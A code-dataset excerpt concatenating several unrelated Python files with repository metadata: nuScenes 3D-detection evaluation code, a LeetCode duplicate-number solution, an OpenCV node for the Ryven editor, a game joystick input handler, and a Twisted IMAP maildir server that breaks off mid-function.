"""Evaluation for a single model in nuScenes protocol.
Args:
result_path (str): Path of the result file.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
metric (str, optional): Metric name used for evaluation.
Default: 'bbox'.
result_name (str, optional): Result name in the metric prefix.
Default: 'pts_bbox'.
Returns:
dict: Dictionary of evaluation details.
"""
from nuscenes import NuScenes
from nuscenes.eval.detection.evaluate import NuScenesEval
output_dir = osp.join(*osp.split(result_path)[:-1])
nusc = NuScenes(
version=self.version, dataroot=self.data_root, verbose=False)
eval_set_map = {
'v1.0-mini': 'mini_val',
'v1.0-trainval': 'val',
}
nusc_eval = NuScenesEval(
nusc,
config=self.eval_detection_configs,
result_path=result_path,
eval_set=eval_set_map[self.version],
output_dir=output_dir,
verbose=False)
nusc_eval.main(render_curves=False)
# record metrics
metrics = mmcv.load(osp.join(output_dir, 'metrics_summary.json'))
detail = dict()
metric_prefix = f'{result_name}_NuScenes'
for name in self.CLASSES:
for k, v in metrics['label_aps'][name].items():
val = float('{:.4f}'.format(v))
detail['{}/{}_AP_dist_{}'.format(metric_prefix, name, k)] = val
for k, v in metrics['label_tp_errors'][name].items():
val = float('{:.4f}'.format(v))
detail['{}/{}_{}'.format(metric_prefix, name, k)] = val
for k, v in metrics['tp_errors'].items():
val = float('{:.4f}'.format(v))
detail['{}/{}'.format(metric_prefix,
self.ErrNameMapping[k])] = val
detail['{}/NDS'.format(metric_prefix)] = metrics['nd_score']
detail['{}/mAP'.format(metric_prefix)] = metrics['mean_ap']
return detail
def format_results(self, results, jsonfile_prefix=None):
"""Format the results to json (standard format for COCO evaluation).
Args:
results (list[dict]): Testing results of the dataset.
jsonfile_prefix (str): The prefix of json files. It includes
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
Returns:
tuple: Returns (result_files, tmp_dir), where `result_files` is a
dict containing the json filepaths, `tmp_dir` is the temporal
directory created for saving json files when
`jsonfile_prefix` is not specified.
"""
assert isinstance(results, list), 'results must be a list'
assert len(results) == len(self), (
'The length of results is not equal to the dataset len: {} != {}'.
format(len(results), len(self)))
if jsonfile_prefix is None:
tmp_dir = tempfile.TemporaryDirectory()
jsonfile_prefix = osp.join(tmp_dir.name, 'results')
else:
tmp_dir = None
# currently the output prediction results could be in two formats
# 1. list of dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...)
# 2. list of dict('pts_bbox' or 'img_bbox':
# dict('boxes_3d': ..., 'scores_3d': ..., 'labels_3d': ...))
# this is a workaround to enable evaluation of both formats on nuScenes
# refer to https://github.com/open-mmlab/mmdetection3d/issues/449
if not ('pts_bbox' in results[0] or 'img_bbox' in results[0]):
result_files = self._format_bbox(results, jsonfile_prefix)
else:
# should take the inner dict out of 'pts_bbox' or 'img_bbox' dict
result_files = dict()
for name in results[0]:
print(f'\nFormating bboxes of {name}')
results_ = [out[name] for out in results]
tmp_file_ = osp.join(jsonfile_prefix, name)
result_files.update(
{name: self._format_bbox(results_, tmp_file_)})
return result_files, tmp_dir
def evaluate(self,
results,
metric='bbox',
logger=None,
jsonfile_prefix=None,
result_names=['pts_bbox'],
show=False,
out_dir=None,
pipeline=None):
"""Evaluation in nuScenes protocol.
Args:
results (list[dict]): Testing results of the dataset.
metric (str | list[str], optional): Metrics to be evaluated.
Default: 'bbox'.
logger (logging.Logger | str, optional): Logger used for printing
related information during evaluation. Default: None.
jsonfile_prefix (str, optional): The prefix of json files including
the file path and the prefix of filename, e.g., "a/b/prefix".
If not specified, a temp file will be created. Default: None.
show (bool, optional): Whether to visualize.
Default: False.
out_dir (str, optional): Path to save the visualization results.
Default: None.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
Returns:
dict[str, float]: Results of each evaluation metric.
"""
result_files, tmp_dir = self.format_results(results, jsonfile_prefix)
if isinstance(result_files, dict):
results_dict = dict()
for name in result_names:
print('Evaluating bboxes of {}'.format(name))
ret_dict = self._evaluate_single(result_files[name])
results_dict.update(ret_dict)
elif isinstance(result_files, str):
results_dict = self._evaluate_single(result_files)
if tmp_dir is not None:
tmp_dir.cleanup()
if show or out_dir:
self.show(results, out_dir, show=show, pipeline=pipeline)
return results_dict
def _build_default_pipeline(self):
"""Build the default pipeline for this dataset."""
pipeline = [
dict(
type='LoadPointsFromFile',
coord_type='LIDAR',
load_dim=5,
use_dim=5,
file_client_args=dict(backend='disk')),
dict(
type='LoadPointsFromMultiSweeps',
sweeps_num=10,
file_client_args=dict(backend='disk')),
dict(
type='DefaultFormatBundle3D',
class_names=self.CLASSES,
with_label=False),
dict(type='Collect3D', keys=['points'])
]
return Compose(pipeline)
def show(self, results, out_dir, show=False, pipeline=None):
"""Results visualization.
Args:
results (list[dict]): List of bounding boxes results.
out_dir (str): Output directory of visualization result.
show (bool): Whether to visualize the results online.
Default: False.
pipeline (list[dict], optional): raw data loading for showing.
Default: None.
"""
assert out_dir is not None, 'Expect out_dir, got none.'
pipeline = self._get_pipeline(pipeline)
for i, result in enumerate(results):
if 'pts_bbox' in result.keys():
result = result['pts_bbox']
data_info = self.data_infos[i]
pts_path = data_info['lidar_path']
file_name = osp.split(pts_path)[-1].split('.')[0]
points = self._extract_data(i, pipeline, 'points').numpy()
# for now we convert points into depth mode
points = Coord3DMode.convert_point(points, Coord3DMode.LIDAR,
Coord3DMode.DEPTH)
inds = result['scores_3d'] > 0.1
gt_bboxes = self.get_ann_info(i)['gt_bboxes_3d'].tensor.numpy()
show_gt_bboxes = Box3DMode.convert(gt_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
pred_bboxes = result['boxes_3d'][inds].tensor.numpy()
show_pred_bboxes = Box3DMode.convert(pred_bboxes, Box3DMode.LIDAR,
Box3DMode.DEPTH)
show_result(points, show_gt_bboxes, show_pred_bboxes, out_dir,
file_name, show)
def output_to_nusc_box(detection, with_velocity=True):
"""Convert the output to the box class in the nuScenes.
Args:
detection (dict): Detection results.
- boxes_3d (:obj:`BaseInstance3DBoxes`): Detection bbox.
- scores_3d (torch.Tensor): Detection scores.
- labels_3d (torch.Tensor): Predicted box labels.
Returns:
list[:obj:`NuScenesBox`]: List of standard NuScenesBoxes.
"""
box3d = detection['boxes_3d']
scores = detection['scores_3d'].numpy()
labels = detection['labels_3d'].numpy()
box_gravity_center = box3d.gravity_center.numpy()
box_dims = box3d.dims.numpy()
box_yaw = box3d.yaw.numpy()
# our LiDAR coordinate system -> nuScenes box coordinate system
nus_box_dims = box_dims[:, [1, 0, 2]]
box_list = []
for i in range(len(box3d)):
quat = pyquaternion.Quaternion(axis=[0, 0, 1], radians=box_yaw[i])
if with_velocity:
velocity = (*box3d.tensor[i, 7:9], 0.0)
else:
velocity = (0, 0, 0)
# velo_val = np.linalg.norm(box3d[i, 7:9])
# velo_ori = box3d[i, 6]
# velocity = (
# velo_val * np.cos(velo_ori), velo_val * np.sin(velo_ori), 0.0)
box = NuScenesBox(
box_gravity_center[i],
nus_box_dims[i],
quat,
label=labels[i],
score=scores[i],
velocity=velocity)
box_list.append(box)
return box_list
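# Illustrative note on the reordering in output_to_nusc_box above: NuScenesBox takes its
# size argument as (w, l, h), so the [1, 0, 2] slice swaps the first two entries of the
# mmdet3d dims -- e.g. a dims row (4.2, 1.8, 1.6) is passed to NuScenesBox as (1.8, 4.2, 1.6).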
def lidar_nusc_box_to_global(info,
boxes,
classes,
eval_configs,
eval_version='detection_cvpr_2019'):
"""Convert the box from ego to global coordinate.
Args:
info (dict): Info for a specific sample data, including the
calibration information.
boxes (list[:obj:`NuScenesBox`]): List of predicted NuScenesBoxes.
classes (list[str]): Mapped classes in the evaluation.
eval_configs (object): Evaluation configuration object.
eval_version (str, optional): Evaluation version.
Default: 'detection_cvpr_2019'
Returns:
list: List of standard NuScenesBoxes in the global
coordinate.
"""
box_list = []
for box in boxes:
# Move box to ego vehicle coord system
box.rotate(pyquaternion.Quaternion(info['lidar2ego_rotation']))
box.translate(np.array(info['lidar2ego_translation']))
# filter det in ego.
cls_range_map = eval_configs.class_range
radius = np.linalg.norm(box.center[:2], 2)
det_range = cls_range_map[classes[box.label]]
if radius > det_range:
continue
# Move box to global coord system
box.rotate(pyquaternion.Quaternion(info['ego2global_rotation']))
box.translate(np.array(info['ego2global_translation']))
box_list.append(box)
return box_list
| [
"[email protected]"
] | |
ef18e320c181d7603f6cc50f8b4c007b64c977e5 | b8d2f095a4b7ea567ccc61ee318ba879318eec3d | /二分查找/287. 寻找重复数.py | 69bdb06bf5dbca40a1db1643ecf3e21552f93868 | [] | no_license | f1amingo/leetcode-python | a3ef78727ae696fe2e94896258cfba1b7d58b1e3 | b365ba85036e51f7a9e018767914ef22314a6780 | refs/heads/master | 2021-11-10T16:19:27.603342 | 2021-09-17T03:12:59 | 2021-09-17T03:12:59 | 205,813,698 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 621 | py | from typing import List
class Solution:
    # Binary search on the value range [1, n]: guess a number, then scan the array once and count how many elements are <= the guess
def findDuplicate(self, nums: List[int]) -> int:
n = len(nums) - 1
lt, rt = 1, n
while lt < rt:
mid = (lt + rt) // 2
count = 0
for num in nums:
if num <= mid:
count += 1
if count > mid:
rt = mid
else:
lt = mid + 1
return lt
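# Worked example of the counting invariant (illustrative): for nums = [1, 3, 4, 2, 2] and
# the guess mid = 2, three elements are <= 2; since 3 > 2 the duplicate must lie in [1, 2],
# so the search keeps the left half and converges on 2.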
assert Solution().findDuplicate([1, 3, 4, 2, 2]) == 2
assert Solution().findDuplicate([3, 1, 3, 4, 2]) == 3
| [
"[email protected]"
] | |
028d4012be6e2dba637d5afdafcded11bfba6024 | fd8d33572656edf9e1133a72ad4e2fa090f90a5f | /packages/OpenCV/nodes/OpenCV___YUV_YV120/OpenCV___YUV_YV120___METACODE.py | fd27f158254de61c8a19e271393e77c1740baba6 | [
"MIT"
] | permissive | ChristianHohlfeld/Ryven | a01c2eafa79a80883a9490efb5f043fd35f53484 | 53bf7e57a7b0fa25a704cd0d2214a7f76096d4dd | refs/heads/master | 2022-12-12T22:03:57.122034 | 2020-08-31T13:45:45 | 2020-08-31T13:45:45 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,153 | py | from NIENV import *
import cv2
# USEFUL
# self.input(index) <- access to input data
# self.outputs[index].set_val(val) <- set output data port value
# self.main_widget <- access to main widget
class %NODE_TITLE%_NodeInstance(NodeInstance):
def __init__(self, parent_node: Node, flow, configuration=None):
super(%NODE_TITLE%_NodeInstance, self).__init__(parent_node, flow, configuration)
# self.special_actions['action name'] = {'method': M(self.action_method)}
self.img_unYUV_YV12 = None
self.img_YUV_YV12 = None
self.initialized()
def update_event(self, input_called=-1):
self.img_unYUV_YV12 = self.input(0)
self.img_YUV_YV12 = cv2.cvtColor(self.img_unYUV_YV12,cv2.COLOR_BGRA2YUV_YV12)
#self.cnvt=cv2.imshow('gray_image',self.img_YUV_I420)
self.main_widget.show_image(self.img_YUV_YV12)
self.set_output_val(0, self.img_YUV_YV12)
def get_data(self):
data = {}
# ...
return data
def set_data(self, data):
pass
# ...
def remove_event(self):
pass
| [
"[email protected]"
] | |
ce4f4de3c6cd53f78a77f8f7d171a222a593ea7e | 4a28e3e3afb28c0455ea21cfb983c3a8284dc5dd | /Reverse.py | bc387ecd0eea4a1c2e6fe9318772782e900f4b58 | [] | no_license | omdeshmukh20/Python-3-Programming | 60f6bc4e627de9d643a429e64878a636f3875cae | 9fb4c7fa54bc26d18b69141493c7a72e0f68f7d0 | refs/heads/main | 2023-08-28T04:37:27.001888 | 2021-10-29T17:03:34 | 2021-10-29T17:03:34 | 370,008,995 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 674 | py | #Discription: Accept Number From User And Return Reverse Of That Number Using For-Loop
#Date: 14/08/21
#Author : Om Deshmukh
# Reverse Operation
def Reverse(iValue1):
iDigit = 0
iRev = 0
if iValue1 < 0:
exit("Invalid Input! | Note : Give Input Greater Than 0")
for _ in range(iValue1):
if iValue1 == 0:
break
iDigit = iValue1 % 10
iRev = (iRev * 10) + iDigit
iValue1 = iValue1 // 10
return iRev
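# Worked trace (illustrative): for iValue1 = 123 the loop peels off the digits 3, 2, 1 and
# builds iRev as 3 -> 32 -> 321, then exits via the break once iValue1 reaches 0.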
# Entry Point
def main():
iNo1 = int(input("Enter The Number : "))
iRet = Reverse(iNo1)
print("Reverse Number is : ", iRet)
# Code Starter
if __name__ == "__main__":
main()
| [
"[email protected]"
] | |
4497e161d8e06316103a36d717fe15e66be3c951 | 3b504a983f1807ae7c5af51078bfab8c187fc82d | /client/input/InputSubsystem/JoyInput.py | 03a21fda604012c74ea881e2b4fdb3fcfdc8f167 | [] | no_license | SEA-group/wowp_scripts | 7d35fd213db95ea6b3dbd1ec6d3e0f13de86ba58 | 2fe54a44df34f2dcaa6860a23b835dcd8dd21402 | refs/heads/master | 2021-09-07T23:10:13.706605 | 2018-03-02T17:23:48 | 2018-03-02T17:23:48 | 117,280,141 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,816 | py | # Embedded file name: scripts/client/input/InputSubsystem/JoyInput.py
import Keys
import BWPersonality
import InputMapping
import math
from MathExt import *
from consts import ROLL_AXIS, VERTICAL_AXIS, HORIZONTAL_AXIS, FORCE_AXIS, FLAPS_AXIS, INPUT_SYSTEM_STATE
from input.InputSubsystem.InputSubsystemBase import InputSubsystemBase
import GameEnvironment
BASE_SMOOTH_WINDOW = 10
class ProxyCamStrategy(object):
@staticmethod
def rotateCursor(*args):
pass
class JoystickExpertInput(InputSubsystemBase):
def __init__(self, profile):
self._profile = profile
self.__isRawForceAxis = True
self.__smoothStack = {}
self.__lastSmoothWin = {}
class JoyEvent:
def __init__(self):
self.deviceId = None
self.axis = None
self.value = None
return
self.__joyEvent = JoyEvent()
def pushLastEvent(self):
for deviceId in BWPersonality.axis:
for axis in BWPersonality.axis[deviceId]:
self.__joyEvent.deviceId = deviceId
self.__joyEvent.axis = axis
self.__joyEvent.value = BWPersonality.axis[deviceId][axis]
self.processJoystickEvent(self.__joyEvent)
def restart(self):
self.__smoothStack = {}
self.__lastSmoothWin = {}
def dispose(self):
self._profile = None
return
@property
def __cameraStrategy(self):
cam = GameEnvironment.getCamera()
if cam is not None:
return cam.getDefualtStrategies['CameraStrategyNormal']
else:
return ProxyCamStrategy
def processJoystickEvent(self, event):
jSet = InputMapping.g_instance.joystickSettings
rValue = 0.0
vValue = 0.0
hValue = 0.0
fValue = 0.0
if event.axis == jSet.ROLL_AXIS and (event.deviceId == jSet.ROLL_DEVICE or 0 == jSet.ROLL_DEVICE):
rValue = -event.value if jSet.INVERT_ROLL else event.value
rawValue = rValue
if abs(rValue) <= jSet.ROLL_DEAD_ZONE:
self._profile.sendData(ROLL_AXIS, 0.0, -rawValue)
else:
rValue = self.__signalSmoothing(jSet.ROLL_AXIS, rValue, jSet.ROLL_SMOOTH_WINDOW)
rValue = self.__signalDiscrete(jSet.ROLL_SENSITIVITY, rValue, event.deviceId, event.axis)
rValue = math.copysign((abs(rValue) - jSet.ROLL_DEAD_ZONE) / (1.0 - jSet.ROLL_DEAD_ZONE), rValue)
rValue = InputMapping.translateAxisValue(jSet.AXIS_X_CURVE, rValue)
rValue = clamp(-1.0, -rValue, 1.0)
self._profile.sendData(ROLL_AXIS, rValue, -rawValue)
elif event.axis == jSet.VERTICAL_AXIS and (event.deviceId == jSet.VERTICAL_DEVICE or 0 == jSet.VERTICAL_DEVICE):
vValue = -event.value if jSet.INVERT_VERTICAL else event.value
rawValue = vValue
if abs(vValue) <= jSet.VERTICAL_DEAD_ZONE:
self._profile.sendData(VERTICAL_AXIS, 0.0, rawValue)
else:
vValue = self.__signalSmoothing(jSet.VERTICAL_AXIS, vValue, jSet.VERTICAL_SMOOTH_WINDOW)
vValue = self.__signalDiscrete(jSet.VERTICAL_SENSITIVITY, vValue, event.deviceId, event.axis)
vValue = math.copysign((abs(vValue) - jSet.VERTICAL_DEAD_ZONE) / (1 - jSet.VERTICAL_DEAD_ZONE), vValue)
vValue = InputMapping.translateAxisValue(jSet.AXIS_Y_CURVE, vValue)
vValue = clamp(-1.0, -vValue, 1.0)
self._profile.sendData(VERTICAL_AXIS, vValue, -rawValue)
elif event.axis == jSet.HORIZONTAL_AXIS and (event.deviceId == jSet.HORIZONTAL_DEVICE or 0 == jSet.HORIZONTAL_DEVICE):
hValue = event.value if jSet.INVERT_HORIZONTAL else -event.value
rawValue = hValue
if abs(hValue) <= jSet.HORIZONTAL_DEAD_ZONE:
self._profile.sendData(HORIZONTAL_AXIS, 0.0, rawValue)
else:
hValue = self.__signalSmoothing(jSet.HORIZONTAL_AXIS, hValue, jSet.HORIZONTAL_SMOOTH_WINDOW)
hValue = self.__signalDiscrete(jSet.HORIZONTAL_SENSITIVITY, hValue, event.deviceId, event.axis)
hValue = InputMapping.translateAxisValue(jSet.AXIS_Z_CURVE, hValue)
hValue = math.copysign((abs(hValue) - jSet.HORIZONTAL_DEAD_ZONE) / (1 - jSet.HORIZONTAL_DEAD_ZONE), hValue)
if InputMapping.g_instance.currentProfileType == INPUT_SYSTEM_STATE.GAMEPAD_DIRECT_CONTROL:
hValue *= -1
hValue = clamp(-1.0, hValue, 1.0)
self._profile.sendData(HORIZONTAL_AXIS, hValue, rawValue)
elif event.axis == jSet.FORCE_AXIS and (event.deviceId == jSet.FORCE_DEVICE or 0 == jSet.FORCE_DEVICE):
fValue = -event.value if jSet.INVERT_FORCE else event.value
rawValue = fValue
if self.__isRawForceAxis:
fValue = self.__renormalization(fValue)
self._profile.sendData(FORCE_AXIS, fValue, rawValue)
self.__cameraStrategy.rotateCursor(vValue * 0.01, hValue * 0.01)
def setCursorCamera(self, isCursorCamera):
pass
def setRawForceAxis(self, value):
self.__isRawForceAxis = value
def __renormalization(self, x):
maxForce = InputMapping.g_instance.joystickSettings.POINT_OF_NORMAL_THRUST
deadZone = InputMapping.g_instance.joystickSettings.FORCE_DEAD_ZONE
if deadZone > 1:
deadZone = 1
if x > deadZone:
return 1
if maxForce < x <= deadZone:
return 0
return clamp(-1.0, (x + 1.0) / (max(-0.99, maxForce) + 1.0) - 1.0, 0.0)
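    # Illustrative numbers for the mapping above (the settings values are hypothetical):
    # with POINT_OF_NORMAL_THRUST = -0.5 and FORCE_DEAD_ZONE = 0.9, a raw value of 0.95
    # returns 1, 0.0 falls in the (maxForce, deadZone] band and returns 0, and -0.75
    # maps to (-0.75 + 1.0) / (-0.5 + 1.0) - 1.0 = -0.5.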
def __signalDiscrete(self, discrete, value, deviceId, axis):
SENSITIVITY = 14 * discrete
joyDPI = BigWorld.getJoystickResolution(deviceId, axis) / pow(2.0, math.floor(SENSITIVITY))
halfSingleSignal = 0.5 / joyDPI
if abs(value) < 0.25 * halfSingleSignal or abs(value) > 1.0 - 0.25 * halfSingleSignal:
return value
absValue = math.floor(abs(value) * joyDPI) / joyDPI + halfSingleSignal
return math.copysign(absValue, value)
def __signalSmoothing(self, axis, value, win, e = 0.99):
if self.__lastSmoothWin.get(axis, None) != win:
self.__lastSmoothWin[axis] = win
if self.__smoothStack.get(axis, None):
self.__smoothStack[axis] = []
window = max(int(BASE_SMOOTH_WINDOW * win), 1)
self.__smoothStack.setdefault(axis, []).append(value)
if len(self.__smoothStack[axis]) > window:
self.__smoothStack[axis].pop(0)
val = math.copysign(1.0, value) if abs(value) >= e else sum(self.__smoothStack[axis]) / len(self.__smoothStack[axis])
return val | [
"[email protected]"
] | |
6259b00f99bd0193a97019a733fdc7d17fd4e74b | 916773e4af7367022067abf2e92bc8ab7302b1e5 | /trunk/prodRoot/desktopApp/test/imap/imapServer.py | 270d663e89626782dde57cc0a1ac2653dc86f92d | [] | no_license | weijia/ufs | 814ac76a9a44a931803971cb4edcefd79c87d807 | c43cdae2dfe89b747b6970138ccdf9ddf7f766b3 | refs/heads/master | 2016-09-01T18:35:33.754862 | 2012-08-14T09:02:40 | 2012-08-14T09:02:40 | 3,439,945 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,361 | py | from twisted.mail import imap4, maildir
from twisted.internet import reactor, defer, protocol
from twisted.cred import portal, checkers, credentials
from twisted.cred import error as credError
from twisted.python import filepath
from zope.interface import implements
import time, os, random, pickle
MAILBOXDELIMITER = "."
class IMAPUserAccount(object):
implements(imap4.IAccount)
def __init__(self, userDir):
self.dir = userDir
self.mailboxCache = {}
# make sure Inbox exists
inbox = self._getMailbox("Inbox", create=True)
def listMailboxes(self, ref, wildcard):
for box in os.listdir(self.dir):
yield box, self._getMailbox(box)
def select(self, path, rw=True):
"return an object implementing IMailbox for the given path"
return self._getMailbox(path)
def _getMailbox(self, path, create=False):
"""
Helper function to get a mailbox object at the given
path, optionally creating it if it doesn't already exist.
"""
# According to the IMAP spec, Inbox is case-insensitive
pathParts = path.split(MAILBOXDELIMITER)
if pathParts[0].lower() == 'inbox': pathParts[0] = 'Inbox'
path = MAILBOXDELIMITER.join(pathParts)
if not self.mailboxCache.has_key(path):
fullPath = os.path.join(self.dir, path)
if not os.path.exists(fullPath):
if create:
maildir.initializeMaildir(fullPath)
else:
raise KeyError, "No such mailbox"
self.mailboxCache[path] = IMAPMailbox(fullPath)
return self.mailboxCache[path]
def create(self, path):
"create a mailbox at path and return it"
self._getMailbox(path, create=True)
def delete(self, path):
"delete the mailbox at path"
raise imap4.MailboxException("Permission denied.")
def rename(self, oldname, newname):
"rename a mailbox"
oldPath = os.path.join(self.dir, oldname)
newPath = os.path.join(self.dir, newname)
os.rename(oldPath, newPath)
def isSubscribed(self, path):
"return a true value if user is subscribed to the mailbox"
return self._getMailbox(path).metadata.get('subscribed', False)
def subscribe(self, path):
"mark a mailbox as subscribed"
box = self._getMailbox(path)
box.metadata['subscribed'] = True
box.saveMetadata()
return True
def unsubscribe(self, path):
"mark a mailbox as unsubscribed"
box = self._getMailbox(path)
box.metadata['subscribed'] = False
box.saveMetadata()
return True
class ExtendedMaildir(maildir.MaildirMailbox):
"""
Extends maildir.MaildirMailbox to expose more
of the underlying filename data
"""
def __iter__(self):
"iterates through the full paths of all messages in the maildir"
return iter(self.list)
def __len__(self):
return len(self.list)
def __getitem__(self, i):
return self.list[i]
def deleteMessage(self, filename):
index = self.list.index(filename)
os.remove(filename)
del(self.list[index])
class IMAPMailbox(object):
implements(imap4.IMailbox)
def __init__(self, path):
self.maildir = ExtendedMaildir(path)
self.metadataFile = os.path.join(path, '.imap-metadata.pickle')
if os.path.exists(self.metadataFile):
self.metadata = pickle.load(file(self.metadataFile, 'r+b'))
else:
self.metadata = {}
self.initMetadata()
self.listeners = []
self._assignUIDs()
def initMetadata(self):
if not self.metadata.has_key('flags'):
self.metadata['flags'] = {} # dict of message IDs to flags
if not self.metadata.has_key('uidvalidity'):
# create a unique integer ID to identify this version of
# the mailbox, so the client could tell if it was deleted
# and replaced by a different mailbox with the same name
self.metadata['uidvalidity'] = random.randint(1000000, 9999999)
if not self.metadata.has_key('uids'):
self.metadata['uids'] = {}
if not self.metadata.has_key('uidnext'):
self.metadata['uidnext'] = 1 # next UID to be assigned
def saveMetadata(self):
pickle.dump(self.metadata, file(self.metadataFile, 'w+b'))
def _assignUIDs(self):
# make sure every message has a uid
for messagePath in self.maildir:
messageFile = os.path.basename(messagePath)
if not self.metadata['uids'].has_key(messageFile):
self.metadata['uids'][messageFile] = self.metadata['uidnext']
self.metadata['uidnext'] += 1
self.saveMetadata()
def getHierarchicalDelimiter(self):
return MAILBOXDELIMITER
def getFlags(self):
"return list of flags supported by this mailbox"
return [r'\Seen', r'\Unseen', r'\Deleted',
r'\Flagged', r'\Answered', r'\Recent']
def getMessageCount(self):
return len(self.maildir)
def getRecentCount(self):
return 0
def getUnseenCount(self):
def messageIsUnseen(filename):
filename = os.path.basename(filename)
uid = self.metadata['uids'].get(filename)
flags = self.metadata['flags'].get(uid, [])
if not r'\Seen' in flags:
return True
return len(filter(messageIsUnseen, self.maildir))
def isWriteable(self):
return True
def getUIDValidity(self):
return self.metadata['uidvalidity']
def getUID(self, messageNum):
filename = os.path.basename(self.maildir[messageNum-1])
return self.metadata['uids'][filename]
def getUIDNext(self):
        return self.metadata['uidnext']
def _uidMessageSetToSeqDict(self, messageSet):
"""
take a MessageSet object containing UIDs, and return
a dictionary mapping sequence numbers to filenames
"""
# if messageSet.last is None, it means 'the end', and needs to
# be set to a sane high number before attempting to iterate
# through the MessageSet
if not messageSet.last:
messageSet.last = self.metadata['uidnext']
allUIDs = []
for filename in self.maildir:
shortFilename = os.path.basename(filename)
allUIDs.append(self.metadata['uids'][shortFilename])
allUIDs.sort()
seqMap = {}
for uid in messageSet:
# the message set covers a span of UIDs. not all of them
# will necessarily exist, so check each one for validity
if uid in allUIDs:
sequence = allUIDs.index(uid)+1
seqMap[sequence] = self.maildir[sequence-1]
return seqMap
def _seqMessageSetToSeqDict(self, messageSet):
"""
take a MessageSet object containing message sequence numbers,
and return a dictionary mapping sequence number to filenames
"""
# if messageSet.last is None, it means 'the end', and needs to
# be set to a sane high number before attempting to iterate
# through the MessageSet
if not messageSet.last: messageSet.last = len(self.maildir)-1
seqMap = {}
for messageNo in messageSet:
seqMap[messageNo] = self.maildir[messageNo-1]
return seqMap
def fetch(self, messages, uid):
if uid:
messagesToFetch = self._uidMessageSetToSeqDict(messages)
else:
messagesToFetch = self._seqMessageSetToSeqDict(messages)
for seq, filename in messagesToFetch.items():
uid = self.getUID(seq)
flags = self.metadata['flags'].get(uid, [])
yield seq, MaildirMessage(file(filename).read(), uid, flags)
def addListener(self, listener):
self.listeners.append(listener)
return True
def removeListener(self, listener):
self.listeners.remove(listener)
return True
def requestStatus(self, path):
return imap4.statusRequestHelper(self, path)
def addMessage(self, msg, flags=None, date=None):
if flags is None: flags = []
return self.maildir.appendMessage(msg).addCallback(
self._addedMessage, flags)
def _addedMessage(self, _, flags):
# the first argument is the value returned from
# MaildirMailbox.appendMessage. It doesn't contain any meaningful
# information and can be discarded. Using the name "_" is a Twisted
# idiom for unimportant return values.
self._assignUIDs()
messageFile = os.path.basename(self.maildir[-1])
messageID = self.metadata['uids'][messageFile]
self.metadata['flags'][messageID] = flags
self.saveMetadata()
def store(self, messageSet, flags, mode, uid):
if uid:
messages = self._uidMessageSetToSeqDict(messageSet)
else:
messages = self._seqMessageSetToSeqDict(messageSet)
setFlags = {}
for seq, filename in messages.items():
uid = self.getUID(seq)
if mode == 0: # replace flags
messageFlags = self.metadata['flags'][uid] = flags
else:
messageFlags = self.metadata['flags'].setdefault(uid, [])
for flag in flags:
# mode 1 is append, mode -1 is delete
if mode == 1 and not messageFlags.count(flag):
messageFlags.append(flag)
elif mode == -1 and messageFlags.count(flag):
messageFlags.remove(flag)
setFlags[seq] = messageFlags
self.saveMetadata()
return setFlags
def expunge(self):
"remove all messages marked for deletion"
removed = []
for filename in self.maildir:
uid = self.metadata['uids'].get(os.path.basename(filename))
if r"\Deleted" in self.metadata['flags'].get(uid, []):
self.maildir.deleteMessage(filename)
# you could also throw away the metadata here
removed.append(uid)
return removed
def destroy(self):
"complete remove the mailbox and all its contents"
raise imap4.MailboxException("Permission denied.")
from cStringIO import StringIO
import email
class MaildirMessagePart(object):
implements(imap4.IMessagePart)
def __init__(self, mimeMessage):
self.message = mimeMessage
self.data = str(self.message)
def getHeaders(self, negate, *names):
"""
Return a dict mapping header name to header value. If *names
is empty, match all headers; if negate is true, return only
headers _not_ listed in *names.
"""
if not names: names = self.message.keys()
headers = {}
if negate:
for header in self.message.keys():
if header.upper() not in names:
headers[header.lower()] = self.message.get(header, '')
else:
for name in names:
headers[name.lower()] = self.message.get(name, '')
return headers
def getBodyFile(self):
"return a file-like object containing this message's body"
bodyData = str(self.message.get_payload())
return StringIO(bodyData)
def getSize(self):
return len(self.data)
def getInternalDate(self):
return self.message.get('Date', '')
def isMultipart(self):
return self.message.is_multipart()
def getSubPart(self, partNo):
return MaildirMessagePart(self.message.get_payload(partNo))
class MaildirMessage(MaildirMessagePart):
implements(imap4.IMessage)
def __init__(self, messageData, uid, flags):
self.data = messageData
self.message = email.message_from_string(self.data)
self.uid = uid
self.flags = flags
def getUID(self):
return self.uid
def getFlags(self):
return self.flags
class MailUserRealm(object):
implements(portal.IRealm)
avatarInterfaces = {
imap4.IAccount: IMAPUserAccount,
}
def __init__(self, baseDir):
self.baseDir = baseDir
def requestAvatar(self, avatarId, mind, *interfaces):
for requestedInterface in interfaces:
if self.avatarInterfaces.has_key(requestedInterface):
# make sure the user dir exists (avatarId is username)
userDir = os.path.join(self.baseDir, avatarId)
if not os.path.exists(userDir):
os.mkdir(userDir)
# return an instance of the correct class
avatarClass = self.avatarInterfaces[requestedInterface]
avatar = avatarClass(userDir)
# null logout function: take no arguments and do nothing
logout = lambda: None
return defer.succeed((requestedInterface, avatar, logout))
# none of the requested interfaces was supported
raise KeyError("None of the requested interfaces is supported")
def passwordFileToDict(filename):
passwords = {}
for line in file(filename):
if line and line.count(':'):
username, password = line.strip().split(':')
passwords[username] = password
return passwords
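
# The password file is expected to contain one "username:password" pair per
# line; blank lines and lines without a colon are skipped. For example
# (made-up credentials):
#
#   alice:secret
#   bob:hunter2
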
class CredentialsChecker(object):
implements(checkers.ICredentialsChecker)
credentialInterfaces = (credentials.IUsernamePassword,
credentials.IUsernameHashedPassword)
def __init__(self, passwords):
"passwords: a dict-like object mapping usernames to passwords"
self.passwords = passwords
def requestAvatarId(self, credentials):
"""
check to see if the supplied credentials authenticate.
if so, return an 'avatar id', in this case the name of
the IMAP user.
The supplied credentials will implement one of the classes
in self.credentialInterfaces. In this case both
IUsernamePassword and IUsernameHashedPassword have a
checkPassword method that takes the real password and checks
it against the supplied password.
"""
username = credentials.username
if self.passwords.has_key(username):
realPassword = self.passwords[username]
checking = defer.maybeDeferred(
